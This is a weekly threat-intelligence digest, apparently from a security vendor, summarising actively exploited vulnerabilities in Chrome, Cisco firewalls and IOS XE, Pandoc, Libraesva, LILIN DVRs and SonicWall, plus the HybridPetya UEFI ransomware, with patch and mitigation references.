This week underscored the growing risk from zero-day exploitation, with multiple high-impact vulnerabilities confirmed under active attack. CISA added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog two in Cisco software and one in Google Chrome all confirmed as zero-days. Beyond these, Libraesva confirmed targeted exploitation of a critical flaw in its Email Security Gateway, while researchers observed ongoing abuse of a Server-Side Request Forgery vulnerability in the Linux utility JGM Pandoc. Cisco’s IOS XE Software was also confirmed to be under active attack, underscoring the persistent focus of adversaries on enterprise-critical infrastructure.

Botnet activity has seen a sharp escalation, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st actively exploiting vulnerabilities in GitLab, cloud gateways, and PHP-based applications. Meanwhile, IoT-centric botnets such as Mirai, Bashlite, Tsunami, and BrickerBot are ramping up their campaigns, specifically targeting EirD1000 routers to gain persistence and facilitate lateral movement across networks.  

ESET researchers have reported HybridPetya, a Petya/NotPetya-inspired ransomware that continues the evolution of earlier strains by leveraging a vulnerability to compromise UEFI-based systems. Threat activity also persists, with attackers exploiting a flaw in LILIN DVRs to spread botnets like Chalubo, FBot, and Moobot. In addition, the ongoing exploitation of a SonicWall vulnerability remains a concern, as it has been directly linked to Akira ransomware intrusions targeting Australian organizations.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-10585
A Type Confusion Vulnerability has been identified in the V8 JavaScript and WebAssembly engine, posing a serious security risk. Successful exploitation of this flaw could enable a remote attacker to bypass the browser’s security sandbox by luring users into visiting a specially crafted malicious webpage. Google has addressed the issue by releasing a new stable channel update, version 140.0.7339.185/.186 for Windows and Mac and 140.0.7339.185 for Linux. While Google has acknowledged that this vulnerability has been exploited as a zero-day in the wild, it has not disclosed any details regarding active campaigns linked to the attacks. The vulnerability has also been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-20333
A Buffer Overflow vulnerability has been discovered in the Cisco Secure Firewall Adaptive Security Appliance (ASA) and Secure Firewall Threat Defense (FTD) Software VPN Web Server. The issue arises from improper validation of user-supplied input in HTTP(S) requests and could allow remote attackers with valid VPN credentials to execute arbitrary code as root, potentially leading to complete device compromise. Cisco’s Product Security Incident Response Team (PSIRT) confirmed that the flaw is already being exploited in the wild and cautioned that it may be chained with CVE-2025-20362 for increased impact. Both vulnerabilities have been added to CISA KEV catalog, and Cisco strongly urges customers to upgrade to a fixed software release to mitigate the risk.

CVE-2025-20352
A Denial of Service and Remote Code Execution Vulnerability has been identified in Cisco IOS and IOS XE software, caused by a stack overflow condition in the SNMP subsystem. Exploitation could allow a low-privileged attacker to force a system reload, resulting in a DoS, or enable a high-privileged attacker to execute arbitrary code as the root user, gaining full control of the device. This high severity vulnerability affects all versions of SNMP, and while Cisco has released software updates and mitigation guidance, no direct workarounds exist. Cisco PSIRT has confirmed active exploitation in the wild, where attackers leveraged compromised local Administrator credentials to target vulnerable systems.  

CVE-2025-20362
A Missing Authorization vulnerability has been identified in the Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software VPN Web Server. The flaw arises from improper validation of user-supplied input in HTTP(S) requests and could allow an unauthenticated, remote attacker to access restricted URL endpoints without proper authentication. By sending crafted HTTP requests, attackers may exploit this weakness to bypass security controls. Cisco’s Product Security Incident Response Team (PSIRT) has confirmed that the flaw is already being actively targeted and warned that it could be chained with CVE-2025-20333 for greater impact. Both vulnerabilities have also been added to CISA KEV catalog, and Cisco continues to strongly recommend that customers upgrade to a fixed software release to ensure remediation.

CVE-2025-51591
A Server-Side Request Forgery (SSRF) Vulnerability, has been identified in the Linux utility JGM Pandoc, allowing attackers to inject a crafted iframe and potentially compromise entire cloud infrastructures. Security firm Wiz reported that the flaw has been exploited in the wild to target Amazon Web Services (AWS) Instance Metadata Service (IMDS), particularly EC2 instances relying on the older IMDSv1, which exposes sensitive metadata and temporary credentials. Pandoc maintainers confirmed that iframe rendering is intended behavior, placing responsibility on users to sanitize input or apply options such as “-f html+raw_html” or “--sandbox” to block malicious iframe content. To mitigate risks, organizations are advised to enforce IMDSv2, apply the principle of least privilege (PoLP) for IAM roles, and patch vulnerable third-party software to reduce exposure.

CVE-2025-59689
A Command Injection Vulnerability via a compressed email attachment in the Libraesva Email Security Gateway (ESG) allows attackers to execute arbitrary shell commands. This flaw stems from improper sanitization of files within certain archive formats, enabling attackers to bypass input validation and inject commands. The issue affects versions 4.5 through 5.5.x prior to 5.5.7. Successful exploitation allows execution of shell commands under a non-privileged account, which could then be leveraged for persistence, lateral movement, or privilege escalation. Libraesva confirmed that this vulnerability has already been abused in one targeted incident, likely conducted by a foreign hostile state, with the attack focusing on a single appliance rather than a broad-scale financial crime campaign.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-34130
360Netlab reported that since August 2019, its unknown threat detection system has observed multiple groups exploiting a zero-day vulnerability in LILIN DVRs to distribute botnets such as Chalubo, FBot, and Moobot. The exploited vulnerability is an arbitrary file read issue in /z/zbin/net_html.cgi. In February 2020, the manufacturer addressed the issue and released the firmware program 2.0b60_20200207 to patch the vulnerabilities. These findings underscore how unpatched or poorly secured IoT devices can become a persistent attack vector, fueling botnet operations for years.

CVE-2024-40766
The Australian Cyber Security Centre (ACSC) has issued an alert regarding the active exploitation of CVE-2024-40766, a critical vulnerability in SonicWall SSL VPNs that has been directly linked to Akira ransomware intrusions against Australian organizations. The flaw affects Gen 5, Gen 6, and Gen 7 SonicWall devices running vulnerable SonicOS versions, and successful exploitation can grant attackers unauthorized access to corporate networks or even crash the firewall, escalating the impact. According to the ACSC, threat actors are actively leveraging this weakness, with Akira ransomware groups increasingly using VPN vulnerabilities as entry points. Considering this, the agency is urging all organizations to immediately patch their devices, stressing that the latest security builds are available for download via mysonicwall.com.

CVE-2024-7344
ESET researchers uncovered HybridPetya on VirusTotal, a Petya/NotPetya-style ransomware that extends those tactics to UEFI-based systems by weaponizing CVE-2024-7344, the vulnerable Howyar reloader.efi loader. On unpatched machines the malware's installer drops a bootkit into the EFI System Partition that includes a modified bootloader, fallback loader, config/validation files, an exploit payload container, often delivered as an XOR-obfuscated cloak.dat) and a status file; the bootkit uses a three-state flag (0 = ready, 1 = encrypted, 2 = decrypted after ransom) and a \EFI\Microsoft\Boot\counter to track encrypted clusters. Its core routine encrypts the NTFS Master File Table (MFT) with Salsa20 while displaying a fake CHKDSK message to hide activity. Victims receive a ransom demand (US$1,000 in Bitcoin) and can enter a purchased key to trigger staged decryption and restoration of backed-up bootloaders; unlike NotPetya, HybridPetya can reconstruct decryption keys from installation artifacts. Selected variants exploit the insecure loading behavior of reloader.efi (renamed as bootmgfw.efi) to bypass Secure Boot, a deficiency Microsoft addressed by revoking the vulnerable binaries in its January 2025 update.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

• https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-adds-one-known-exploited-vulnerability-catalog  
• https://www.cisa.gov/news-events/alerts/2025/09/25/cisa-directs-federal-agencies-identify-and-mitigate-potential-compromise-cisco-devices  
• https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_17.html
• https://docs.libraesva.com/knowledgebase/security-advisory-command-injection-vulnerability-cve-2025-59689/  
• https://securityonline.info/cve-2025-59689-libraesva-esg-command-injection-flaw-exploited-in-the-wild/  
• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte